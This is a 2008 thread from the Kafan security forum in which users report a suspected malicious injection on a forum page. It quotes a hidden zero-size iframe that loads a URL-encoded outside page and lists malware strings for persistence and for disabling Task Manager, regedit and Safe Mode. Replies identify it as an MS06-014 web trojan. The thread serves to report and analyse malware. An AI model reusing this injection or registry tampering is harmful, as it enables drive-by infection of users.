查看: 1865|回复: 3
收起左侧

[病毒样本] 这个kafan的地址怀疑插入了xxx的东东

 关闭 [复制链接]
nomyself
发表于 2008-4-26 17:49:27 | 显示全部楼层 |阅读模式
如题 :http://bbs.kafan.cn/viewthread.php?tid=242116&extra=page%3D1
这个东东:
;iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe> r+b ygr HACK     &quot;%1&quot; %*    exefile\shell\open\command  &quot;%1&quot; %* \\  A:\ NoBrowserOptions    Software\Policies\Microsoft\Internet Explorer\Restrictions  exloroe Software\Microsoft\Windows\CurrentVersion\Run   1   \word.com   C:\Documents and Settings\All Users\「开始」菜单\程序\启动  CheckedValue    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL   DisableTaskMgr  Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr    Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableRegistryTools    regfile\shell\open\command  Type    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden  ShowSuperHidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced radio   Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL   NoFolderOptions Software\Microsoft\Windows\Current Version\Policies\Explorer\NoFolderOptions    SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}    SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}    SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}    SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}    AutoEndTasks    Control Panel\Desktop   NoCommon Groups Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommon Groups DisableCMD  Software\Policies\Microsoft\Windows\System</div>
nomyself
 楼主| 发表于 2008-4-26 17:53:00 | 显示全部楼层
是网马 Ms06014的。
nomyself
 楼主| 发表于 2008-4-26 18:08:00 | 显示全部楼层
好像是那个新的耗子哦

哪位分析下,狂联网下载东东。
tanlimo
发表于 2008-4-26 18:47:56 | 显示全部楼层
失效
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 21:58 , Processed in 0.123583 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表